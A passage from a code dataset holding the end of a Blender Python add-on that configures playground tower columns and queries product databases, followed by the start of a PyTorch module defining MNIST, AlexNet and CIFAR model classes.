bpy.context.object.aqua_cores.keys():\r\n bpy.context.scene.propriedades_derivacao_selecionada.add().derivacao_selecionada = (\r\n der\r\n )\r\n\r\n\r\ndef lista_derivacao(self, context):\r\n obj = bpy.context.object\r\n tipo = obj.aqua.tipo_derivacao\r\n lista_derivacao = []\r\n lista_derivacao.clear()\r\n\r\n return [\r\n (\"05_unica\", \"05_unica\", \"\")\r\n if tipo == \"05_unica\"\r\n else (item, item.split(\"_\")[1], \"\")\r\n for item in obj.aqua_cores.keys()\r\n if item not in lista_derivacao and obj.type == \"MESH\"\r\n ]\r\n\r\n\r\ndef update_derivacao(self, context):\r\n obj = bpy.context.object\r\n tipo = obj.aqua.tipo_derivacao\r\n\r\n obj.aqua.leitura_derivacao = \"\"\r\n\r\n if tipo == \"10_cores\":\r\n if obj.aqua.derivacao != \"98_sortida\":\r\n obj.active_material = bpy.data.materials[obj.aqua.derivacao]\r\n\r\n elif tipo == \"20_tam mad plast\":\r\n val_derivacao = 
float(obj.aqua.derivacao.split(\"_\")[1].split(\" \")[0])\r\n obj.dimensions.z = val_derivacao / 100\r\n\r\n obj.aqua.leitura_derivacao = obj.aqua.derivacao\r\n # if (\r\n # not (\r\n # obj.aqua.nome.startswith(f\"COLUNA {bpy.context.scene.cena.ancoragem}\")\r\n # or obj.aqua.nome.startswith(\"COLUNA MAD PLAST\")\r\n # )\r\n # and obj.hide_viewport == False\r\n # ):\r\n # print(f\"{str(obj.aqua.nome)} -:- {str(obj.aqua.derivacao)}\")\r\n\r\n # obj_importador = {obj.aqua.codigo: [obj.aqua.nome, obj.aqua.derivacao]}\r\n # dataframe = pd.DataFrame.from_dict(\r\n # obj_importador, orient=\"index\", columns=[\"ITEM\", \"DERIVACAO\"]\r\n # )\r\n # print(dataframe)\r\n\r\n\r\ndef update_altura(self, context):\r\n bpy.context.object.location.z = bpy.context.object.aqua.altura\r\n\r\n\r\ndef update_cor_personalizada(self, context):\r\n material = bpy.data.materials[\"99_colorida\"].node_tree\r\n\r\n\r\ndef update_cor_metal_personalizada(self, context):\r\n print(\"COR DO METAL PERSONALIZADO\")\r\n\r\n\r\ndef atualizar_cor_metal(self, context):\r\n obj = bpy.context.object\r\n cor_nova = obj.aqua.cor_metal\r\n obj.active_material = bpy.data.materials[cor_nova]\r\n\r\n print(f\"COR METAL ATUALIZADO: {cor_nova}\")\r\n\r\n\r\ndef remove_mat_duplicados():\r\n material_names = set()\r\n\r\n for obj in bpy.data.objects:\r\n for slt in obj.material_slots:\r\n material_name = slt.name.split(\".\")[0]\r\n if material_name in bpy.data.materials:\r\n slt.material = bpy.data.materials.get(material_name)\r\n material_names.add(material_name)\r\n\r\n for m in bpy.data.materials:\r\n material_name = m.name.split(\".\")[0]\r\n if material_name.isnumeric() and material_name not in material_names:\r\n bpy.data.materials.remove(m)\r\n\r\n\r\ndef query_colunas_furos_avulsas():\r\n pm_produtos = conexao_banco()[0]\r\n \"\"\"\r\n Executes a SQL query to retrieve the product code and description from the 'tb_produtos' table in the database.\r\n The query selects the rows where the product code starts with '240' and orders them by the product code.\r\n\r\n Parameters:\r\n None\r\n\r\n Returns:\r\n query_colunas_dict_ (dict): A dictionary where the keys are product codes and the values are lists containing\r\n the product description, the size of the column, the type of lid, the anchoring, and the column hole.\r\n \"\"\"\r\n\r\n pm_produtos.execute(\r\n \"\"\"\r\n select\r\n produtos.codpro, produtos.despro\r\n from tb_produtos as produtos\r\n where produtos.codpro like ('240%')\r\n order by produtos.codpro\r\n \"\"\"\r\n )\r\n\r\n query_colunas = pm_produtos.fetchall()\r\n query_colunas_avulsos = []\r\n query_colunas_avulsos.extend(query_colunas)\r\n query_colunas_dict_ = {}\r\n\r\n for coluna_ in query_colunas_avulsos:\r\n tam_col = coluna_[1].split(\" \")[2]\r\n tampa = coluna_[1].split(\"- \")[-1]\r\n ancoragem = coluna_[1].split(\" \")[1]\r\n furo_coluna = coluna_[1].split(\" - \")[1]\r\n query_colunas_dict_.update(\r\n {coluna_[0]: [coluna_[1], tam_col, tampa, ancoragem, furo_coluna]}\r\n )\r\n\r\n return query_colunas_dict_\r\n\r\n\r\ndef selecionar_objetos_por_nome(obj_name):\r\n \"\"\"\r\n Selects an object in Blender by its name.\r\n\r\n Parameters:\r\n obj_name (str): The name of the object to be selected.\r\n\r\n Returns:\r\n None\r\n \"\"\"\r\n bpy.ops.object.select_all(action=\"DESELECT\") # Deselect all objects\r\n obj = bpy.data.objects[obj_name] # Get the object\r\n obj.select_set(True) # Select the object\r\n bpy.context.view_layer.objects.active = obj # Set the object as active\r\n\r\n\r\ndef 
report_furos_coluna(torre):\r\n \"\"\"Plastic wood length - platform height - ground embedment + 5 = hole height.\r\n Plastic wood length - hole height - ground embedment + 5 = platform height.\"\"\"\r\n nome_coluna = \"\"\r\n fix = bpy.context.scene.cena.ancoragem\r\n alt_plat = 0\r\n tam_col = \"\"\r\n tampa = \"\"\r\n if bpy.context.scene.cena.ancoragem == \"NENHUM\":\r\n painel_aviso(\"Selecione uma fixação\", \"Erro\", \"ERROR\")\r\n else:\r\n for obj in bpy.context.scene.objects:\r\n if (\r\n obj.name_full.find(\"COLUNA MAD PLAST\") != -1\r\n and obj.hide_viewport == False\r\n ):\r\n # Select and activate the object\r\n selecionar_objetos_por_nome(obj.name_full)\r\n\r\n for objetos in bpy.data.collections[torre].objects:\r\n if (\r\n objetos.name_full.startswith(\"GUIA_PLATAFORMA\")\r\n and round(objetos.location.z, 2) != 0.1\r\n and objetos.hide_viewport == False\r\n ):\r\n alt_plat = round(\r\n bpy.context.scene.objects[objetos.name].location.z * 100\r\n )\r\n print(alt_plat)\r\n\r\n for coluna in bpy.data.collections[torre].objects:\r\n if (\r\n coluna.name_full.startswith(\"COLUNA MAD PLAST\")\r\n and coluna.hide_viewport == False\r\n ):\r\n tam_col = coluna.aqua.derivacao.split(\"_\")[-1].split(\" \")[0]\r\n\r\n child_col = []\r\n child_col.clear()\r\n\r\n child_col = [\r\n chld.name.split(\".\")[0]\r\n for chld in coluna.children_recursive\r\n if chld.name.split(\".\")[0]\r\n not in (\"L PEQUENO GALV\", \"COQUEIRO M1\")\r\n ]\r\n\r\n tampa = \"COM TAMPA\" if len(child_col) > 1 else \"SEM TAMPA\"\r\n anc = 0 if fix == \"PISO\" else 10\r\n\r\n for codigo, colunas in query_colunas_furos_avulsas().items():\r\n alt_furo = re.sub(r\"[^0-9]\", \"\", colunas[4])\r\n if alt_furo.isdigit() == True:\r\n alt_furo_ = (\r\n int(tam_col) - int(alt_furo) - int(anc) + 5\r\n ) #\r\n nome_coluna_ = f\"{coluna.name.split(' MAD')[0]} {fix} {tam_col} CM - {alt_furo} CM - {tampa}\"\r\n\r\n if (\r\n int(colunas[1]) == int(tam_col)\r\n and tampa == colunas[2]\r\n and fix == colunas[3]\r\n and int(alt_furo_) == int(alt_plat)\r\n and objetos.hide_viewport == False\r\n ):\r\n coluna.aqua.codigo = str(codigo)\r\n coluna.aqua.nome = nome_coluna_\r\n\r\n print(codigo, colunas[0], \" -->\", coluna.name)\r\n\r\n return nome_coluna\r\n\r\n\r\ndef ajustar_derivacao_colunas(torre):\r\n \"\"\"\r\n This function adjusts the derivation of columns based on specific conditions.\r\n\r\n Parameters:\r\n - torre: The name of the tower.\r\n\r\n Returns:\r\n None\r\n \"\"\"\r\n cobertura = False\r\n acesso = False\r\n alt_plat = 0\r\n col_der = \"10_82 CM\" # int kept only to force an error if no case below matches - \"10_82 CM\"\r\n fix = bpy.context.scene.cena.ancoragem\r\n\r\n lista_colunas = [\r\n col.name\r\n for col in bpy.data.collections[torre].objects\r\n if col.aqua.codigo # TODO: query the column table so these codes are always up to date\r\n in [\r\n \"2402400001\",\r\n \"2402400002\",\r\n \"2402400003\",\r\n \"2402400004\",\r\n \"2402400005\",\r\n \"2402400006\",\r\n \"2402400007\",\r\n \"2402400008\",\r\n \"2402400009\",\r\n \"2402400010\",\r\n \"2402400011\",\r\n \"2402400012\",\r\n \"2402400013\",\r\n \"2402400014\",\r\n \"2402400015\",\r\n \"2402400016\",\r\n \"2402400017\",\r\n \"2402400018\",\r\n \"2402400019\",\r\n \"2402400020\",\r\n \"2402400021\",\r\n \"2402400022\",\r\n \"2402400023\",\r\n \"2402400024\",\r\n \"2402400025\",\r\n \"2402400026\",\r\n \"2402400027\",\r\n \"2402400028\",\r\n \"2402400029\",\r\n \"2402400030\",\r\n \"2402400031\",\r\n \"2402400032\",\r\n \"2402400033\",\r\n \"2402400034\",\r\n 
\"2402400035\",\r\n \"2402400036\",\r\n \"2402400037\",\r\n \"2402400038\",\r\n \"2402400039\",\r\n \"2402400040\",\r\n \"2402400041\",\r\n \"2402400042\",\r\n \"2402400043\",\r\n \"2402400044\",\r\n \"2402400045\",\r\n \"2402400046\",\r\n \"2402400047\",\r\n \"2402400048\",\r\n \"2402400049\",\r\n \"2402400050\",\r\n \"2402400051\",\r\n \"2402400052\",\r\n \"2402400053\",\r\n \"2402400054\",\r\n \"2402400055\",\r\n \"2402400056\",\r\n \"2402400057\",\r\n \"2402400058\",\r\n \"2402400059\",\r\n \"2402400060\",\r\n \"2402400061\",\r\n \"2402400062\",\r\n \"2402400063\",\r\n \"2402400064\",\r\n \"40410001\",\r\n ]\r\n if not (col[\"COLUNA_CUSTOM\"] == 1)\r\n ]\r\n\r\n for plataforma in bpy.data.collections[torre].objects:\r\n if (\r\n plataforma.name_full.startswith(\"GUIA_PLATAFORMA\")\r\n and round(plataforma.location.z, 2) != 0.1\r\n ):\r\n alt_plat = round(bpy.context.scene.objects[plataforma.name].location.z, 2)\r\n\r\n # DETECTAR TOLDO E ACESSO\r\n for filhos in plataforma.children:\r\n if (filhos.aqua.nome.startswith(\"TOLDO\")) == True:\r\n cobertura = True\r\n if filhos.aqua.nome.startswith(\"ACESSO M1\") == True:\r\n acesso = True\r\n\r\n # ATUALIZAR \"L\"\r\n for obj in bpy.context.scene.objects:\r\n for prop in obj.keys():\r\n if prop == \"AQUA_L\":\r\n if fix == \"PISO\":\r\n obj[\"AQUA_L\"] = 1\r\n obj.update_tag()\r\n\r\n elif fix == \"TERRA\":\r\n obj[\"AQUA_L\"] = 0\r\n obj.update_tag()\r\n\r\n for coluna in lista_colunas:\r\n if cobertura == False: # ESSA DEVE SER A PRIMEIRA CONDIÇÃO\r\n col_der = \"80_230 CM\"\r\n\r\n if alt_plat == 0.45:\r\n col_der = \"80_230 CM\"\r\n\r\n if alt_plat == 1.6:\r\n col_der = \"120_300 CM\"\r\n\r\n if alt_plat in [0.4, 0.8]:\r\n if acesso == False:\r\n col_der = \"80_230 CM\"\r\n\r\n elif acesso == True:\r\n col_der = \"90_250 CM\"\r\n\r\n if cobertura == True:\r\n # print(\"===========\")\r\n # print(alt_plat)\r\n\r\n if alt_plat == 1.0:\r\n col_der = \"90_250 CM\"\r\n\r\n if acesso == True:\r\n col_der = \"100_270 CM\"\r\n if fix == \"TERRA\":\r\n col_der = \"110_280 CM\"\r\n\r\n elif alt_plat == 1.2:\r\n col_der = \"100_270 CM\"\r\n if fix == \"TERRA\":\r\n col_der = \"110_280 CM\"\r\n\r\n if acesso == True:\r\n col_der = \"120_300 CM\"\r\n\r\n # AJUSTAR DERIVACAO\r\n\r\n bpy.context.view_layer.objects.active = bpy.data.objects[coluna]\r\n bpy.data.objects[coluna].aqua.derivacao = col_der\r\n bpy.data.objects[coluna].aqua.leitura_derivacao = col_der\r\n\r\n # AJUSTAR FIXACAO\r\n if fix == \"PISO\":\r\n bpy.data.objects[coluna].location.z = 0.0\r\n elif fix == \"TERRA\":\r\n bpy.data.objects[coluna].location.z = -0.1\r\n\r\n # print(\r\n # f\"{torre} FIXACAO:{fix} - PLATAFORMA:{alt_plat} - TOLDO:{cobertura} - ACESSO:{acesso}\"\r\n # )\r\n\r\n\r\ndef furos_colunas():\r\n \"\"\"\r\n Esta função itera sobre os objetos da cena e seleciona e ativa os objetos que têm o nome \"COLUNA MAD PLAST\"\r\n e não estão ocultos na viewport. Em seguida, cria uma lista dos objetos filhos do objeto selecionado, excluindo\r\n certos nomes. A função determina se o objeto selecionado tem mais de um filho e atribui o valor \"COM TAMPA\" à variável\r\n 'tampa' se tiver, caso contrário, atribui o valor \"SEM TAMPA\". Também atribui o valor \"SEM FURO\" à variável 'alt_coluna'\r\n se a coordenada z da localização do objeto for menor que 1, caso contrário, atribui None. A variável 'anc' recebe o\r\n valor 0 se a variável 'fix' for igual a \"PISO\", caso contrário, recebe 10. 
A função então arredonda a dimensão z do objeto\r\n multiplicada por 100 e atribui o resultado à variável 'tam_col_scene'. Por fim, a função consulta um dicionário\r\n de códigos e descrições de colunas e, se uma descrição correspondente for encontrada com base nos valores de 'tam_col_scene',\r\n 'tampa', 'fix' e 'alt_coluna', o atributo 'aqua.codigo' do objeto é atualizado com o código correspondente, o atributo 'aqua.nome'\r\n do objeto é atualizado com o nome correspondente e informações sobre o código, nome e nome do objeto são impressas.\r\n Após iterar sobre todos os objetos, a função chama a função 'report_furos_coluna' para cada torre em uma lista de torres.\r\n \"\"\"\r\n fix = bpy.context.scene.cena.ancoragem\r\n print(\"COLUNAS:\")\r\n for obj in bpy.context.scene.objects:\r\n if obj.name_full.find(\"COLUNA MAD PLAST\") != -1 and obj.hide_viewport == False:\r\n # SELECIONAR E ATIVAR OBJETO\r\n selecionar_objetos_por_nome(obj.name_full)\r\n\r\n child_col = []\r\n child_col.clear()\r\n child_col = [\r\n chld.name.split(\".\")[0]\r\n for chld in obj.children_recursive\r\n if chld.name.split(\".\")[0]\r\n not in (\r\n \"L PEQUENO GALV\",\r\n \"COQUEIRO M1\",\r\n \"ADICIONAR NA LISTA DE SEPARACAO - SAPATA COQUEIRO E 4 KIT PF L\",\r\n \"ADICIONAR NA LISTA DE SEPARACAO - SAPATA COQUEIRO E 4 KIT \",\r\n )\r\n ]\r\n\r\n tampa = \"COM TAMPA\" if len(child_col) > 1 else \"SEM TAMPA\"\r\n alt_coluna = \"SEM FURO\" if obj.location.z < 1 else None\r\n anc = 0 if fix == \"PISO\" else 10\r\n\r\n # SELECIONAR E ATIVAR OBJETO\r\n selecionar_objetos_por_nome(obj.name_full)\r\n\r\n tam_col_scene = round(obj.dimensions.z * 100)\r\n\r\n for codigo, descricao in query_colunas_furos_avulsas().items():\r\n nome_coluna_ = f\"{obj.name.split(' MAD')[0]} {fix} {tam_col_scene} CM - {alt_coluna} - {tampa}\"\r\n if (\r\n int(descricao[1]) == int(tam_col_scene)\r\n and tampa == descricao[2]\r\n and fix == descricao[3]\r\n and alt_coluna == descricao[4]\r\n ):\r\n obj.aqua.codigo = str(codigo)\r\n obj.aqua.nome = nome_coluna_\r\n print(str(codigo), nome_coluna_, \" -->\", obj.name_full)\r\n\r\n for torre in list(Colecoes().lista_torre_colecoes_cena()):\r\n # for torre in lista_torres():\r\n report_furos_coluna(torre)\r\n\r\n\r\ndef ajustar_todas_torres():\r\n for i in list(Colecoes().lista_torre_colecoes_cena()):\r\n # for i in lista_torres():\r\n ajustar_derivacao_colunas(i)\r\n\r\n\r\ndef update_ancoragem(self, context):\r\n ajustar_todas_torres()\r\n furos_colunas()\r\n pf_novo = \"3003020142_KIT PF TORRE L PEQUENO GALV FOGO PISO\"\r\n pf_novo_acop = \"3003020143_KIT PF TORRE ACOP L PEQUENO GALV FOGO PISO\"\r\n\r\n for obj in bpy.data.objects:\r\n for pf in obj.kit_pf.keys():\r\n if pf.split(\"_\")[0] == \"3003020140\":\r\n for obj in bpy.data.objects[obj.name_full].kit_pf:\r\n obj.name = pf_novo\r\n\r\n elif pf.split(\"_\")[0] == \"3003020141\":\r\n for obj in bpy.data.objects[obj.name_full].kit_pf:\r\n obj.name = pf_novo_acop\r\n\r\n print(f\"Ancoragem alterada para: {bpy.context.scene.cena.ancoragem}\")\r\n\r\n\r\ndef carregar_dados_json(obj):\r\n import ast\r\n\r\n aqua = obj.aqua\r\n nome_aqua = obj.aqua.nome\r\n codigo_aqua = obj.aqua.codigo\r\n nome_gen = os.path.splitext(os.path.basename(nome_aqua))[0]\r\n\r\n pm_db = conexao_banco_local()[0]\r\n\r\n select_props = \"\"\"\r\n SELECT\r\n codigo,\r\n nome,\r\n derivacao_ativa,\r\n kits_pf,\r\n lista_derivacao,\r\n peso,\r\n tipo_derivacao\r\n\r\n FROM\r\n tb_itens\r\n WHERE\r\n codigo = ?\r\n and parametro = 'OBJETO';\r\n \"\"\"\r\n\r\n 
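# Parameterized query: the DB driver (sqlite3, per the module imports) binds\r\n # codigo_aqua to the \"?\" placeholder; e.g. pm_db.execute(select_props, (\"2402400001\",))\r\n # would fetch that product's row without manual string formatting.\r\n 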
pm_db.execute(select_props, (codigo_aqua,))\r\n # from icecream import ic\r\n\r\n for info_item in pm_db.fetchall():\r\n aqua.peso = float(info_item[5])\r\n aqua.codigo = str(info_item[0])\r\n aqua.derivaco = info_item[4]\r\n aqua.preco = float(info_item[0])\r\n\r\n # print(aqua.codigo, aqua.peso, aqua.derivacao, f\"R$ {round(float(aqua.preco), 2)}\")\r\n\r\n if aqua.nome != \"COLUNA MAD PLAST 9 X 9CM\":\r\n obj.kit_pf.clear()\r\n with contextlib.suppress(Exception):\r\n for i in ast.literal_eval(info_item[3]):\r\n obj.kit_pf.add().name = i\r\n\r\n tipo = aqua.tipo_derivacao\r\n obj.aqua_cores.clear() # Clear the previous list\r\n\r\n for i in ast.literal_eval(info_item[4]):\r\n obj.aqua_cores.add().name = i\r\n\r\n if aqua.tipo_derivacao == \"05_unica\":\r\n aqua.derivacao = \"05_unica\"\r\n\r\n if aqua.tipo_derivacao == \"10_cores\":\r\n aqua.derivacao = info_item[2]\r\n\r\n if aqua.tipo_derivacao == \"20_tam mad plast\":\r\n aqua.derivacao = (\r\n \"100_270 CM\"\r\n if bpy.context.scene.cena.ancoragem == \"PISO\"\r\n else \"110_280 CM\"\r\n )\r\n val_derivacao = float(aqua.derivacao.split(\"_\")[1].split(\" \")[0])\r\n obj.dimensions.z = val_derivacao / 100\r\n\r\n aqua.leitura_derivacao = aqua.derivacao\r\n\r\n print(\r\n f\"------------------------------------------------- ATUALIZADO - {obj.aqua.nome}\"\r\n )\r\n\r\n\r\ndef carregar_dados_kit_pf_json(obj):\r\n nome_aqua = obj.aqua.nome\r\n nome_gen = os.path.splitext(os.path.basename(nome_aqua))[0]\r\n\r\n # -------------------------------------------------------\r\n # CAMINHO: PEGAR DA OUTRA FUNCAO\r\n data = caminhos_pastas()[1]\r\n # -------------------------------------------------------\r\n\r\n # file = Path(data + nome_aqua + \".txt\")\r\n file = Path(f\"{data}{nome_aqua}.txt\")\r\n\r\n # checar se o arquivo existe\r\n if not os.path.exists(file):\r\n print(f\"caminho arquivo {str(file)} nao existe\")\r\n bpy.ops.object.aviso_prop(\"INVOKE_DEFAULT\")\r\n\r\n else:\r\n with open(file) as json_data:\r\n dados_kit_pf = json.load(json_data)\r\n\r\n for item, key in dados_kit_pf.items():\r\n if item == \"kits_pf\" and obj.aqua.nome != \"COLUNA MAD PLAST 9 X 9CM\":\r\n obj.kit_pf.clear() # LIMPAR LISTA ANTERIOR\r\n for i in dados_kit_pf[item]:\r\n obj.kit_pf.add().name = i\r\n ##\r\n for col in bpy.data.collections:\r\n if (\r\n not col.name.isdigit()\r\n and not col.name.startswith(\"GERAR_VISTAS\")\r\n and col.kit_pf.keys() != []\r\n ):\r\n col.kit_pf.add().name = i\r\n\r\n print(\r\n f\"------------------------------------------------- ATUALIZADO KIT PF - {obj.aqua.nome}\"\r\n )\r\n\r\n\r\ndef carregar_dados_objeto(conjunto_objetos):\r\n for obj in conjunto_objetos:\r\n if obj.aqua.nome != \"\":\r\n selecionar_objetos_por_nome(obj.name_full)\r\n\r\n # bpy.ops.object.select_all(\r\n # action=\"DESELECT\"\r\n # ) # DESLECIONAR QUALQUER OBJETO SELECIONADO\r\n\r\n nome = obj.name_full # NOME OBJETO NO BLENDER\r\n\r\n # SELECIONAR E ATIVAR OBJETO\r\n bpy.context.view_layer.objects.active = bpy.data.objects[nome]\r\n bpy.data.objects[nome].select_set(True)\r\n\r\n if bpy.context.object.name_full.startswith(\"COLUNA MAD PLAST\"):\r\n bpy.ops.objects.ajustar_colunas()\r\n else:\r\n # CARREGAR DADOS DO JSON\r\n carregar_dados_json(obj)\r\n\r\n\r\ndef nomes_colunas():\r\n pm_produtos.execute(\r\n \"\"\"\r\n select\r\n produtos.codpro, produtos.despro\r\n from tb_produtos as produtos\r\n where produtos.codpro like ('240%')\r\n order by produtos.codpro\r\n \"\"\"\r\n )\r\n return [colunas[1] for colunas in 
pm_produtos.fetchall()]\r\n\r\n\r\ndef carregar_dados_kit_pf_objeto(self, conjunto_objetos):\r\n \"\"\"\r\n Loads the PF kit data for a set of objects.\r\n\r\n Parameters:\r\n self (object): The current object.\r\n conjunto_objetos (list): A list of objects.\r\n\r\n Returns:\r\n None\r\n \"\"\"\r\n try:\r\n for obj in conjunto_objetos:\r\n if obj.aqua.nome != \"\" and obj.aqua.nome not in nomes_colunas():\r\n selecionar_objetos_por_nome(obj.name_full)\r\n nome_aqua = obj.aqua.nome\r\n nome_gen = os.path.splitext(os.path.basename(nome_aqua))[0]\r\n\r\n # -------------------------------------------------------\r\n # PATH: taken from the other helper function\r\n data = caminhos_pastas()[1]\r\n # -------------------------------------------------------\r\n\r\n pm_db = conexao_banco_local()[0]\r\n\r\n select_props = \"\"\"\r\n SELECT\r\n kits_pf\r\n FROM\r\n tb_itens\r\n WHERE\r\n nome = ?\r\n and nome not like ('COLUNA MAD PLAST%')\r\n and parametro = 'OBJETO';\r\n \"\"\"\r\n\r\n pm_db.execute(select_props, (obj.aqua.nome,))\r\n\r\n for info_item in pm_db.fetchall():\r\n obj.kit_pf.clear() # clear the previous list\r\n try:\r\n for kit in ast.literal_eval(info_item[0]):\r\n if not obj.name.startswith(\"COLUNA MAD PLAST\"):\r\n obj.kit_pf.add().name = kit\r\n print(f\"ATUALIZADO KIT PF: {obj.aqua.nome}\")\r\n except TypeError as error1:\r\n print(obj.aqua.nome, error1)\r\n\r\n for col in bpy.data.collections:\r\n nome_colecao = col.name_full.split(\".\")[0]\r\n if col.kit_pf.keys() != []:\r\n col.kit_pf.clear()\r\n\r\n pm_db = conexao_banco_local()[0]\r\n\r\n select_props = \"\"\"\r\n SELECT\r\n kits_pf\r\n FROM\r\n tb_itens\r\n WHERE\r\n nome = ?\r\n and parametro = 'COLECAO';\r\n \"\"\"\r\n\r\n pm_db.execute(select_props, (nome_colecao,))\r\n\r\n for info_item in pm_db.fetchall():\r\n try:\r\n for kit_pf in ast.literal_eval(info_item[0]):\r\n col.kit_pf.add().name = kit_pf\r\n except TypeError as error:\r\n print(obj.aqua.nome, error)\r\n except ReferenceError as E:\r\n print(E)\r\n\r\n\r\ndef pasta_cores():\r\n pasta_cores = caminhos_pastas()[2]\r\n padrao = \"*.blend\"\r\n\r\n for path, subdirs, files in os.walk(pasta_cores):\r\n for name in files:\r\n if fnmatch.fnmatch(\r\n name, padrao\r\n ): # Use fnmatch.fnmatch to check the pattern\r\n cor = os.path.splitext(name)[0]\r\n caminho = os.path.join(\r\n pasta_cores, cor + \".blend\", \"Material\"\r\n ) # Use os.path.join for path manipulation\r\n bpy.ops.wm.append(filename=cor, directory=caminho)\r\n\r\n\r\nclasses = ()\r\n\r\n\r\n# Register and add to the \"object\" menu (required to also use F3 search \"Simple Object Operator\" for quick access).\r\ndef register():\r\n from bpy.utils import register_class\r\n\r\n for cls in classes:\r\n register_class(cls)\r\n\r\n\r\ndef unregister():\r\n from bpy.utils import unregister_class\r\n\r\n for cls in reversed(classes):\r\n unregister_class(cls)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n register()\r\n","repo_name":"igor-amaral-projetos/aquarela-playground-creator","sub_path":"SCRIPTS_PM/funcoes/aqua_obj_props.py","file_name":"aqua_obj_props.py","file_ext":"py","file_size_in_byte":26905,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"28138865357","text":"\"\"\"ptutils model.py.\n\nEncapsulates a neural network model, criterion and optimizer.\n\n\"\"\"\nimport random\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.autograd import Variable\nfrom torch.nn.parallel import data_parallel\n\nfrom ptutils.base 
import Base\n\n\nclass Model(Base):\n\n def __init__(self,\n net=None,\n criterion=None,\n optimizer=None,\n **kwargs):\n super(Model, self).__init__(**kwargs)\n\n self.net = net\n self.criterion = criterion\n self.optimizer = optimizer\n if self.optimizer.params is None:\n params = self.net.parameters()\n if hasattr(self.optimizer, 'defaults'):\n self.optimizer.optimizer = self.optimizer.optimizer_class(params,\n **self.optimizer.defaults)\n else:\n self.optimizer.optimizer = self.optimizer.optimizer_class(params)\n self._loss = None\n if self.use_cuda:\n self.net.cuda(self.devices)\n\n# @property\n# def optimizer(self):\n# return self._optimizer\n#\n# @optimizer.setter\n# def optimizer(self, value):\n# self._optimizer = value\n# if self._optimizer.params == None:\n# params = self.net.parameters()\n# if hasattr(self._optimizer, 'defaults'):\n# self._optimizer.optimizer = self._optimizer.optimizer_class(params,\n# **self._optimizer.defaults)\n# else:\n# self._optimizer.optimizer = self._optimizer.optimizer_class(params)\n#\n\n def forward(self, input):\n input_var = Variable(input)\n input_var = input_var.cuda(self.devices) if self.use_cuda else input_var\n return self.net(input_var)\n\n def loss(self, output, target):\n target_var = Variable(target)\n target_var = target_var.cuda(self.devices) if self.use_cuda else target_var\n loss = self.criterion(output, target_var)\n return loss\n\n def compute_gradients(self, loss=None):\n loss.backward()\n\n def apply_gradients(self):\n self.optimizer.step()\n\n def eval(self):\n \"\"\"Set up model for evaluation.\"\"\"\n self.net.eval()\n\n def train(self):\n \"\"\"Set up model for training.\"\"\"\n self.net.train()\n\n def optimize(self, loss=None):\n self.compute_gradients(loss=loss)\n self.apply_gradients()\n self.optimizer.zero_grad()\n\n def step(self, inputs):\n input, target = inputs\n output = self.forward(input)\n self._loss = self.loss(output, target)\n self.optimize(self._loss)\n return {'loss': self._loss}\n\n\nclass MNISTModel(Model):\n\n def __init__(self, *args, **kwargs):\n super(MNISTModel, self).__init__(*args, **kwargs)\n self.net = MNIST()\n self.learning_rate = 1e-3\n self.criterion = nn.CrossEntropyLoss()\n self.optimizer = optim.Adam(self.net.parameters(), self.learning_rate)\n\n\nclass MNIST(nn.Module, Base):\n\n def __init__(self):\n super(MNIST, self).__init__()\n\n self.layer1 = nn.Sequential(\n nn.Conv2d(1, 16, kernel_size=5, padding=2),\n nn.BatchNorm2d(16),\n nn.ReLU(),\n nn.MaxPool2d(2))\n self.layer2 = nn.Sequential(\n nn.Conv2d(16, 32, kernel_size=5, padding=2),\n nn.BatchNorm2d(32),\n nn.ReLU(),\n nn.MaxPool2d(2))\n self.fc = nn.Linear(7 * 7 * 32, 10)\n\n self.cuda(self.devices)\n\n def forward(self, x):\n out = self.layer1(x)\n out = self.layer2(out)\n out = out.view(out.size(0), -1)\n out = self.fc(out)\n return out\n\n\nclass ConvMNIST(nn.Module, Base):\n def __init__(self):\n super(ConvMNIST, self).__init__()\n\n self.layer1 = nn.Sequential(\n nn.Conv2d(1, 16, kernel_size=5, padding=2),\n nn.BatchNorm2d(16),\n nn.ReLU(),\n nn.MaxPool2d(2))\n self.layer2 = nn.Sequential(\n nn.Conv2d(16, 32, kernel_size=5, padding=2),\n nn.BatchNorm2d(32),\n nn.ReLU(),\n nn.MaxPool2d(2))\n\n def forward(self, x):\n out = self.layer1(x)\n out = self.layer2(out)\n out = out.view(out.size(0), -1)\n return out\n\n\nclass FcMNIST(nn.Module, Base):\n\n def __init__(self):\n super(FcMNIST, self).__init__()\n self.fc = nn.Linear(7 * 7 * 32, 10)\n\n def forward(self, x):\n return self.fc(x)\n\n\nclass DynamicNet(nn.Module):\n def 
__init__(self, D_in, H, D_out):\n super(DynamicNet, self).__init__()\n self.input_linear = torch.nn.Linear(D_in, H)\n self.middle_linear = torch.nn.Linear(H, H)\n self.output_linear = torch.nn.Linear(H, D_out)\n\n def forward(self, x):\n h_relu = self.input_linear(x).clamp(min=0)\n for _ in range(random.randint(0, 3)):\n h_relu = self.middle_linear(h_relu).clamp(min=0)\n y_pred = self.output_linear(h_relu)\n return y_pred\n\n\nclass AlexNet(nn.Module):\n\n def __init__(self, num_classes=10):\n super(AlexNet, self).__init__()\n self.num_classes = num_classes\n\n self.features = nn.Sequential(\n nn.Conv2d(3, 64, kernel_size=11, stride=4, padding=2),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(kernel_size=3, stride=2),\n nn.Conv2d(64, 192, kernel_size=5, padding=2),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(kernel_size=3, stride=2),\n nn.Conv2d(192, 384, kernel_size=3, padding=1),\n nn.ReLU(inplace=True),\n nn.Conv2d(384, 256, kernel_size=3, padding=1),\n nn.ReLU(inplace=True),\n nn.Conv2d(256, 256, kernel_size=3, padding=1),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(kernel_size=3, stride=2),\n )\n self.classifier = nn.Sequential(\n nn.Dropout(),\n nn.Linear(256 * 6 * 6, 4096),\n nn.ReLU(inplace=True),\n nn.Dropout(),\n nn.Linear(4096, 4096),\n nn.ReLU(inplace=True),\n nn.Linear(4096, self.num_classes),\n )\n\n def forward(self, x):\n x = self.features(x)\n x = x.view(x.size(0), 256 * 6 * 6)\n x = self.classifier(x)\n return x\n\n\nclass CIFARConv(nn.Module):\n\n def __init__(self, num_classes=10):\n super(CIFARConv, self).__init__()\n self.num_classes = num_classes\n\n self.features = nn.Sequential(\n nn.Conv2d(3, 64, kernel_size=5, padding=2),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n 